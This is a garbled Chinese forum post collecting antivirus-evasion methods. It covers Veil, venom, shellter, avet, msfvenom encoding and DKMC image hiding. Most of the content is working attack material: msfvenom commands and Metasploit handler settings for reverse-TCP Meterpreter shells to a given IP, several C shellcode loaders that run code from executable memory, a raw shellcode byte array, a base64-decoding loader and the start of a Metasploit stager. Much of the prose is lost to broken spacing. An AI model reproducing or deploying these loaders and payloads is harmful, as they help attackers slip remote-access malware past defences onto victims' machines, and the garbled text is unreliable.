[22263] 2021-08-17_免杀知识汇总

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-08-17_免杀知识汇总 L e m o n S e c   2 0 2 1 - 0 8 - 1 7         1 v e i l +         2 v e n o m         3 k a l i s h e l l t e r         4 a v e t +         1 c s + c         2 m s f + c F o u r E y e D K M C ( ) - - > - - > ( ) - - > 3 . 1   3 . 2   3 . 3   - - > - - > - - > , , e x e - - > : 2 . 1   2 . 2   a p i ( ) - - > d l l - - > d l l , d l l , d l l , d l l , 2 . 3   - - > : 1 , v e i l + 使   g o c d   / o p t l s v e i l v e i l u s e   1 l i s t u s e   1 6 s e t   l h o s t   i p s e t   l p o r t   g e n e r a t e # ( )
> m s f c s g o 1 c s 使 g o p a y l o a d 2 u s e 1 u s e   1 7 3 4 5 3 , c s 6 m i n g w - w 6 4 p a y l o a d m i n g w - w 6 4 2 v e n o m g e n e r a t e # ( ) u s e   e x p l o i t / m u l t i / h a n d l e r # m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   l p o r t   3 3 3 4 m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   s e t   l p o r t   1 0 . 2 1 1 . 5 5 . 2 m s f 5   e x p l o i t ( m u l t i / h a n d l e r )   >   e x p l o i t B A D M A C S   Y   M A C p a y l o a d   C L I C K T R A C K   4   4 C U R S O R C H E C K   1 0 0   1 0 0 G B p a y l o a d   C O M P I L E _ T O _ E X E   Y   e x e H O S T N A M E   C o m p 1   H o s t n a m e C o m p 1 p a y l o a d   I N J E C T _ M E T H O D   V i r t u a l     H e a p M I N P R O C S   2 0   2 0 p a y l o a d   P R O C C H E C K   Y   p a y l o a d   P R O C E S S O R S   2   2 p a y l o a d   R A M C H E C K   Y   3 G p a y l o a d   S L E E P   1 0   1 0   U S E R N A M E   T o m   T o m p a y l o a d U S E R P R O M P T   Y   i n j e c t i o n D E B U G G E R   Y   a t t a c h e d p a y l o a d   D O M A I N   C o m p   C o m p p a y l o a d   U T C C H E C K   Y   使 U T C p a y l o a d s e t   U S E R N A M E   l l l # s e t   H O S T N A M E   w i n 7 s e t   U T C c h e c k   T R U E s e t   U T C c h e c k   T R U E g e n e r a t e # ( ) g c c   - o   c . e x e   c . c   - l   w s 2 _ 3 2 # . / v e n o m . s h
w i n d o w s 3 k a l i s h e l l t e r 4 a v e t 2 p a y l o a d + c s + c h t t p s : / / b l o g . c s d n . n e t / q q _ 3 3 9 4 2 0 4 0 / a r t i c l e / d e t a i l s / 1 0 6 4 6 3 3 6 0 , m s f + c c s , m s f s h e l l c o d e c 1 c b u f [ ] = s h e l l . / v e n o m . s h 2 4 # i p , # w i n d o w s / m e t e r p e r t e r / r e v e r s e _ t c p # # A # 使 , # 1 i p , h a n d l e r   - H   1 0 . 2 1 1 . 5 5 . 2   - P   3 3 3 3   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p ( ) # #   p y t h o n   p y m s f v e n o m   - p     w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   - e   x 8 6 / s h i k a t a _ g a _ n a i   - i   6   - b   ' x 0 0 '   l h o s t = 1 0 . 2 1 1 . 5 5 . 2   l p o r t = 3 3 3 3     - f   c   - o   s h e l l . c u n s i g n e d   c h a r   b u f [ ]   =   " s h e l l c o d e " ; # p r a g m a   c o m m e n t ( l i n k e r , " / s u b s y s t e m : " W i n d o w s "   / e n t r y : " m a i n C R T S t a r t u p " " )   / / w i n d o w s m a i n ( ) {         (   ( v o i d ( * ) ( v o i d ) ) & b u f ) ( ) ;
c 2 } # i n c l u d e   < W i n d o w s . h > # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t r i n g . h > # p r a g m a   c o m m e n t ( l i n k e r , " / s u b s y s t e m : " W i n d o w s "   / e n t r y : " m a i n C R T S t a r t u p " " )   / / w i n d o w s u n s i g n e d   c h a r   b u f [ ]   =   " s h e l l c o d e " ; m a i n ( ) {         c h a r   * M e m o r y ;           M e m o r y = V i r t u a l A l l o c ( N U L L ,   s i z e o f ( b u f ) ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;         m e m c p y ( M e m o r y ,   b u f ,   s i z e o f ( b u f ) ) ;         ( ( v o i d ( * ) ( ) ) M e m o r y ) ( ) ; } # i n c l u d e < w i n d o w s . h > # i n c l u d e < s t d i o . h > u n s i g n e d   c h a r   b u f [ ]   = " x f c x e 8 x 8 2 x 0 0 x 0 0 x 0 0 x 6 0 x 8 9 x e 5 x 3 1 x c 0 x 6 4 x 8 b x 5 0 x 3 0 " " x 8 b x 5 2 x 0 c x 8 b x 5 2 x 1 4 x 8 b x 7 2 x 2 8 x 0 f x b 7 x 4 a x 2 6 x 3 1 x f f " " x a c x 3 c x 6 1 x 7 c x 0 2 x 2 c x 2 0 x c 1 x c f x 0 d x 0 1 x c 7 x e 2 x f 2 x 5 2 " " x 5 7 x 8 b x 5 2 x 1 0 x 8 b x 4 a x 3 c x 8 b x 4 c x 1 1 x 7 8 x e 3 x 4 8 x 0 1 x d 1 " " x 5 1 x 8 b x 5 9 x 2 0 x 0 1 x d 3 x 8 b x 4 9 x 1 8 x e 3 x 3 a x 4 9 x 8 b x 3 4 x 8 b " " x 0 1 x d 6 x 3 1 x f f x a c x c 1 x c f x 0 d x 0 1 x c 7 x 3 8 x e 0 x 7 5 x f 6 x 0 3 " " x 7 d x f 8 x 3 b x 7 d x 2 4 x 7 5 x e 4 x 5 8 x 8 b x 5 8 x 2 4 x 0 1 x d 3 x 6 6 x 8 b " " x 0 c x 4 b x 8 b x 5 8 x 1 c x 0 1 x d 3 x 8 b x 0 4 x 8 b x 0 1 x d 0 x 8 9 x 4 4 x 2 4 " " x 2 4 x 5 b x 5 b x 6 1 x 5 9 x 5 a x 5 1 x f f x e 0 x 5 f x 5 f x 5 a x 8 b x 1 2 x e b " " x 8 d x 5 d x 6 8 x 3 3 x 3 2 x 0 0 x 0 0 x 6 8 x 7 7 x 7 3 x 3 2 x 5 f x 5 4 x 6 8 x 4 c " " x 7 7 x 2 6 x 0 7 x 8 9 x e 8 x f f x d 0 x b 8 x 9 0 x 0 1 x 0 0 x 0 0 x 2 9 x c 4 x 5 4 " " x 5 0 x 6 8 x 2 9 x 8 0 x 6 b x 0 0 x f f x d 5 x 6 a x 0 a x 6 8 x c 0 x a 8 x 2 b x 9 9 " " x 6 8 x 0 2 x 0 0 x 1 1 x 5 c x 8 9 x e 6 x 5 0 x 5 0 x 5 0 x 5 0 x 4 0 x 5 0 x 4 0 x 5 0 " " x 6 8 x e a x 0 f x d f x e 0 x f f x d 5 x 9 7 x 6 a x 1 0 x 5 6 x 5 7 x 6 8 x 9 9 x a 5 " " x 7 4 x 6 1 x f f x d 5 x 8 5 x c 0 x 7 4 x 0 a x f f x 4 e x 0 8 x 7 5 x e c x e 8 x 6 7 " " x 0 0 x 0 0 x 0 0 x 6 a x 0 0 x 6 a x 0 4 x 5 6 x 5 7 x 6 8 x 0 2 x d 9 x c 8 x 5 f x f f " " x d 5 x 8 3 x f 8 x 0 0 x 7 e x 3 6 x 8 b x 3 6 x 6 a x 4 0 x 6 8 x 0 0 x 1 0 x 0 0 x 0 0 " " x 5 6 x 6 a x 0 0 x 6 8 x 5 8 x a 4 x 5 3 x e 5 x f f x d 5 x 9 3 x 5 3 x 6 a x 0 0 x 5 6 " " x 5 3 x 5 7 x 6 8 x 0 2 x d 9 x c 8 x 5 f x f f x d 5 x 8 3 x f 8 x 0 0 x 7 d x 2 8 x 5 8 " " x 6 8 x 0 0 x 4 0 x 0 0 x 0 0 x 6 a x 0 0 x 5 0 x 6 8 x 0 b x 2 f x 0 f x 3 0 x f f x d 5 " " x 5 7 x 6 8 x 7 5 x 6 e x 4 d x 6 1 x f f x d 5 x 5 e x 5 e x f f x 0 c x 2 4 x 0 f x 8 5 " " x 7 0 x f f x f f x f f x e 9 x 9 b x f f x f f x f f x 0 1 x c 3 x 2 9 x c 6 x 7 5 x c 1 " " x c 3 x b b x f 0 x b 5 x a 2 x 5 6 x 6 a x 0 0 x 5 3 x f f x d 5 " ; s i z e _ t   s i z e   =   s i z e o f ( b u f ) ; i n t   m a i n ( ) {     c h a r   * i n j e c t ;     i n j e c t   =   ( c h a r * ) V i r t u a l A l l o c ( N U L L ,   s i z e ,   M E M _ C O M M I T ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;     / /     m e m c p y ( i n j e c t ,   b u f ,   s i z e ) ; / /     ( ( v o i d ( * ) ( ) ) i n j e c t ) ( ) ; / / }
c 3 c 4 c 5 e x e . d l l c 6 b a s e 4 . c } # i n c l u d e   < w i n d o w s . h > # i n c l u d e   < s t d i o . h > # p r a g m a   c o m m e n t ( l i n k e r ,   " / s e c t i o n : . d a t a , R W E " ) u n s i g n e d   c h a r   s h e l l c o d e [ ]   = " " ; v o i d   m a i n ( ) {                 _ _ a s m         {                 m o v   e a x ,   o f f s e t   s h e l l c o d e                 j m p   e a x         } } # i n c l u d e   < w i n d o w s . h > # i n c l u d e   < s t d i o . h > u n s i g n e d   c h a r   b u f [ ]   = " " ; v o i d   m a i n ( ) {       ( ( v o i d ( W I N A P I * ) ( v o i d ) ) & b u f ) ( ) ; } # i n c l u d e   < w i n d o w s . h > # i n c l u d e   < s t d i o . h > # p r a g m a   c o m m e n t ( l i n k e r ,   " / s e c t i o n : . d a t a , R W E " ) u n s i g n e d   c h a r   s h e l l c o d e [ ]   = " " ; v o i d   m a i n ( ) {                 _ _ a s m         {                 m o v   e a x ,   o f f s e t   s h e l l c o d e                 _ e m i t   0 x F F                     _ e m i t   0 x E 0         } } / *   B a s e 6 4   e n c o d e r / d e c o d e r .   O r i g i n a l l y   A p a c h e   f i l e   a p _ b a s e 6 4 . c * / # i n c l u d e   < s t r i n g . h > # i n c l u d e   " b a s e 6 4 . h " / *   a a a a c k   b u t   i t ' s   f a s t   a n d   c o n s t   s h o u l d   m a k e   i t   s h a r e d   t e x t   p a g e .   * / s t a t i c   c o n s t   u n s i g n e d   c h a r   p r 2 s i x [ 2 5 6 ]   = {         / *   A S C I I   t a b l e   * /         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,
        6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 2 ,   6 4 ,   6 4 ,   6 4 ,   6 3 ,         5 2 ,   5 3 ,   5 4 ,   5 5 ,   5 6 ,   5 7 ,   5 8 ,   5 9 ,   6 0 ,   6 1 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,     0 ,     1 ,     2 ,     3 ,     4 ,     5 ,     6 ,     7 ,     8 ,     9 ,   1 0 ,   1 1 ,   1 2 ,   1 3 ,   1 4 ,         1 5 ,   1 6 ,   1 7 ,   1 8 ,   1 9 ,   2 0 ,   2 1 ,   2 2 ,   2 3 ,   2 4 ,   2 5 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   2 6 ,   2 7 ,   2 8 ,   2 9 ,   3 0 ,   3 1 ,   3 2 ,   3 3 ,   3 4 ,   3 5 ,   3 6 ,   3 7 ,   3 8 ,   3 9 ,   4 0 ,         4 1 ,   4 2 ,   4 3 ,   4 4 ,   4 5 ,   4 6 ,   4 7 ,   4 8 ,   4 9 ,   5 0 ,   5 1 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,         6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 ,   6 4 } ; i n t   B a s e 6 4 d e c o d e _ l e n ( c o n s t   c h a r   * b u f c o d e d ) {         i n t   n b y t e s d e c o d e d ;         r e g i s t e r   c o n s t   u n s i g n e d   c h a r   * b u f i n ;         r e g i s t e r   i n t   n p r b y t e s ;         b u f i n   =   ( c o n s t   u n s i g n e d   c h a r   * ) b u f c o d e d ;         w h i l e   ( p r 2 s i x [ * ( b u f i n + + ) ]   < =   6 3 ) ;         n p r b y t e s   =   ( b u f i n   -   ( c o n s t   u n s i g n e d   c h a r   * ) b u f c o d e d )   -   1 ;         n b y t e s d e c o d e d   =   ( ( n p r b y t e s   +   3 )   /   4 )   *   3 ;         r e t u r n   n b y t e s d e c o d e d   +   1 ; } i n t   B a s e 6 4 d e c o d e ( c h a r   * b u f p l a i n ,   c o n s t   c h a r   * b u f c o d e d ) {         i n t   n b y t e s d e c o d e d ;         r e g i s t e r   c o n s t   u n s i g n e d   c h a r   * b u f i n ;         r e g i s t e r   u n s i g n e d   c h a r   * b u f o u t ;         r e g i s t e r   i n t   n p r b y t e s ;         b u f i n   =   ( c o n s t   u n s i g n e d   c h a r   * ) b u f c o d e d ;         w h i l e   ( p r 2 s i x [ * ( b u f i n + + ) ]   < =   6 3 ) ;         n p r b y t e s   =   ( b u f i n   -   ( c o n s t   u n s i g n e d   c h a r   * ) b u f c o d e d )   -   1 ;         n b y t e s d e c o d e d   =   ( ( n p r b y t e s   +   3 )   /   4 )   *   3 ;         b u f o u t   =   ( u n s i g n e d   c h a r   * ) b u f p l a i n ;         b u f i n   =   ( c o n s t   u n s i g n e d   c h a r   * ) b u f c o d e d ;         w h i l e   ( n p r b y t e s   >   4 )   {                 * ( b u f o u t + + )   =                         ( u n s i g n e d   c h a r ) ( p r 2 s i x [ * b u f i n ]   < <   2   |   p r 2 s i x [ b u f i n [ 1 ] ]   > >   4 ) ;                 * ( b u f o u t + + )   =                         ( u n s i g n e d   c h a r ) ( p r 2 s i x [ b u f i n [ 1 ] ]   < <   4   |   p r 2 s i x [ b u f i n [ 2 ] ]   > >   2 ) ;                 * ( b u f o u t + + )   =                         ( u n s i g n e d   c h a r ) ( p r 2 s i x [ b u f i n [ 2 ] ]   < <   6   |   p r 2 s i x [ b u f i n [ 3 ] ] ) ;                 b u f i n   + =   4 ;                 n p r b y t e s   - =   4 ;         }         / *   N o t e :   ( n p r b y t e s   = =   1 )   w o u l d   b e   a n   e r r o r ,   s o   j u s t   i n g o r e   t h a t   c a s e   * /         i f   ( n p r b y t e s   >   1 )   {                 * ( b u f o u t + + )   =                         ( u n s i g n e d   c h a r ) ( p r 2 s i x [ * b u f i n ]   < <   2   |   p r 2 s i x [ b u f i n [ 1 ] ]   > >   4 ) ;         }
b a s e 6 4 . h         i f   ( n p r b y t e s   >   2 )   {                 * ( b u f o u t + + )   =                         ( u n s i g n e d   c h a r ) ( p r 2 s i x [ b u f i n [ 1 ] ]   < <   4   |   p r 2 s i x [ b u f i n [ 2 ] ]   > >   2 ) ;         }         i f   ( n p r b y t e s   >   3 )   {                 * ( b u f o u t + + )   =                         ( u n s i g n e d   c h a r ) ( p r 2 s i x [ b u f i n [ 2 ] ]   < <   6   |   p r 2 s i x [ b u f i n [ 3 ] ] ) ;         }         * ( b u f o u t + + )   =   ' 0 ' ;         n b y t e s d e c o d e d   - =   ( 4   -   n p r b y t e s )   &   3 ;         r e t u r n   n b y t e s d e c o d e d ; } s t a t i c   c o n s t   c h a r   b a s i s _ 6 4 [ ]   = " A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + / " ; i n t   B a s e 6 4 e n c o d e _ l e n ( i n t   l e n ) {         r e t u r n   ( ( l e n   +   2 )   /   3   *   4 )   +   1 ; } i n t   B a s e 6 4 e n c o d e ( c h a r   * e n c o d e d ,   c o n s t   c h a r   * s t r i n g ,   i n t   l e n ) {         i n t   i ;         c h a r   * p ;         p   =   e n c o d e d ;         f o r   ( i   =   0 ;   i   <   l e n   -   2 ;   i   + =   3 )   {                 * p + +   =   b a s i s _ 6 4 [ ( s t r i n g [ i ]   > >   2 )   &   0 x 3 F ] ;                 * p + +   =   b a s i s _ 6 4 [ ( ( s t r i n g [ i ]   &   0 x 3 )   < <   4 )   |                         ( ( i n t ) ( s t r i n g [ i   +   1 ]   &   0 x F 0 )   > >   4 ) ] ;                 * p + +   =   b a s i s _ 6 4 [ ( ( s t r i n g [ i   +   1 ]   &   0 x F )   < <   2 )   |                         ( ( i n t ) ( s t r i n g [ i   +   2 ]   &   0 x C 0 )   > >   6 ) ] ;                 * p + +   =   b a s i s _ 6 4 [ s t r i n g [ i   +   2 ]   &   0 x 3 F ] ;         }         i f   ( i   <   l e n )   {                 * p + +   =   b a s i s _ 6 4 [ ( s t r i n g [ i ]   > >   2 )   &   0 x 3 F ] ;                 i f   ( i   = =   ( l e n   -   1 ) )   {                         * p + +   =   b a s i s _ 6 4 [ ( ( s t r i n g [ i ]   &   0 x 3 )   < <   4 ) ] ;                         / /         * p + +   =   ' = ' ;                 }                 e l s e   {                         * p + +   =   b a s i s _ 6 4 [ ( ( s t r i n g [ i ]   &   0 x 3 )   < <   4 )   |                                 ( ( i n t ) ( s t r i n g [ i   +   1 ]   &   0 x F 0 )   > >   4 ) ] ;                         * p + +   =   b a s i s _ 6 4 [ ( ( s t r i n g [ i   +   1 ]   &   0 x F )   < <   2 ) ] ;                 }                 / / * p + +   =   ' = ' ;         }         * p + +   =   ' 0 ' ;         r e t u r n   p   -   e n c o d e d ; } # i f n d e f   _ B A S E 6 4 _ H _ # d e f i n e   _ B A S E 6 4 _ H _ # i f d e f   _ _ c p l u s p l u s e x t e r n   " C "   { # e n d i f
m s f b a s e 6 4 s h e l l c o d e g c c F o u r E y e k a l i 使 使 1 . 使 s h e l l c o d e _ l a u n c h e r r a w s h e l l c o d e         i n t   B a s e 6 4 e n c o d e _ l e n ( i n t   l e n ) ;         i n t   B a s e 6 4 e n c o d e ( c h a r   *   c o d e d _ d s t ,   c o n s t   c h a r   * p l a i n _ s r c ,   i n t   l e n _ p l a i n _ s r c ) ;         i n t   B a s e 6 4 d e c o d e _ l e n ( c o n s t   c h a r   *   c o d e d _ s r c ) ;         i n t   B a s e 6 4 d e c o d e ( c h a r   *   p l a i n _ d s t ,   c o n s t   c h a r   * c o d e d _ s r c ) ; # i f d e f   _ _ c p l u s p l u s } # e n d i f # e n d i f   / / _ B A S E 6 4 _ H _ s h e l l c o d e . c # i n c l u d e   < W i n d o w s . h > # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t r i n g . h > # i n c l u d e   " b a s e 6 4 . h " u n s i g n e d   c h a r   b u f [ ]   = " m s f   b a s e 6 4   c o d e   h e r e " ; i n t   m a i n ( i n t   a r g c ,   c o n s t   c h a r   *   a r g v [ ] )   {         c h a r   s t r 1 [ 1 0 0 0 ]   =   {   0   } ;         B a s e 6 4 d e c o d e ( s t r 1 ,   b u f ) ;         / / p r i n t f ( " % d     " ,   s i z e o f ( s t r 3 ) ) ;         c h a r   * M e m o r y ;         M e m o r y   =   V i r t u a l A l l o c ( N U L L ,   s i z e o f ( s t r 1 ) ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;         m e m c p y ( M e m o r y ,   s t r 1 ,   s i z e o f ( s t r 1 ) ) ;         ( ( v o i d ( * ) ( ) ) M e m o r y ) ( ) ;         r e t u r n   0 ; } m s f v e n o m   - p     w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   - - e n c r y p t   b a s e 6 4     l h o s t = 1 0 . 2 1 1 . 5 5 . 2   l p o r t = 3 3 3 3     - f   c   >   s h e l l . c g c c   s h e l l c o d e . c   b a s e 6 4 . c   - o   t e s t . e x e u s e   m u l t i / h a n d l e r s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p s e t   L H O S T   1 0 . 2 1 1 . 5 5 . 2 s e t   L P O R T   3 3 3 3 s e t   E n a b l e S t a g e E n c o d i n g   t r u e p y t h o n 3   B y p a s s F r a m e w o r k . p y   m s f v e n o m   - p     w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   - e   x 8 6 / s h i k a t a _ g a _ n a i   - i   6   - b   ' x 0 0 '   l h o s t = 1 0 . 2 1 1 . 5 5 . 2   l p o r t = 3 3 3 3     - f   r a w   - o   s h e l l c o d e . r a w
s h e l l c o d e _ l a u n c h e r e x e D K M C s h e l l c o d e _ l a u n c h e r . e x e   - i   s h e l l c o d e . r a w # 1 [ * ]   ( g e n )     m s f s h e l l c o d e B M P [ * ]   ( w e b )     w e b B M P [ * ]   ( p s )     p s p a y l o a d [ * ]   ( s c )     m s f r a w s h e l l c o d e [ * ]   ( e x i t )     退 m s f r a w s c r a w s h e l l c o d e g e n s h e l l c o d e B M P p s p o w e r s h e l l B M P p a y l o a d w e b w e b B M P h t t p s : / / m p . w e i x i n . q q . c o m / s / U Z q O B Q K E M c X t F 5 Z U 7 E 5 5 F g h t t p s : / / w w w . f r e e b u f . c o m / a r t i c l e s / s y s t e m / 2 2 7 4 6 3 . h t m l h t t p s : / / u k n o w s e c . c n / p o s t s / n o t e s / s h e l l c o d e % E 5 % 8 A % A 0 % E 8 % B D % B D % E 6 % 8 0 % B B % E 7 % B B % 9 3 . h t m l
m e t a 6 4 3 2 / *   *   A   C - b a s e d   s t a g e r   c l i e n t   c o m p a t   w i t h   t h e   M e t a s p l o i t   F r a m e w o r k   *         b a s e d   o n   a   d i s c u s s i o n   o n   t h e   M e t a s p l o i t   F r a m e w o r k   m a i l i n g   l i s t   *   *   @   R a p h a e l   M u d g e   ( r a f f i @ s t r a t e g i c c y b e r . c o m )   *   @ l i c e n s e   B S D   L i c e n s e .   *   *   R e l e v a n t   m e s s a g e s :   *   *   h t t p : / / m a i l . m e t a s p l o i t . c o m / p i p e r m a i l / f r a m e w o r k / 2 0 1 2 - 9 / 0 0 8 6 6 0 . h t m l   *   *   h t t p : / / m a i l . m e t a s p l o i t . c o m / p i p e r m a i l / f r a m e w o r k / 2 0 1 2 - 9 / 0 0 8 6 6 4 . h t m l   * / # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t d l i b . h > # i n c l u d e   < w i n d o w s . h > # i n c l u d e   < w i n s o c k 2 . h > / *   i n i t   w i n s o c k   * / v o i d   w i n s o c k _ i n i t ( )   {     W S A D A T A     w s a D a t a ;     W O R D           w V e r s i o n R e q u e s t e d ;
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则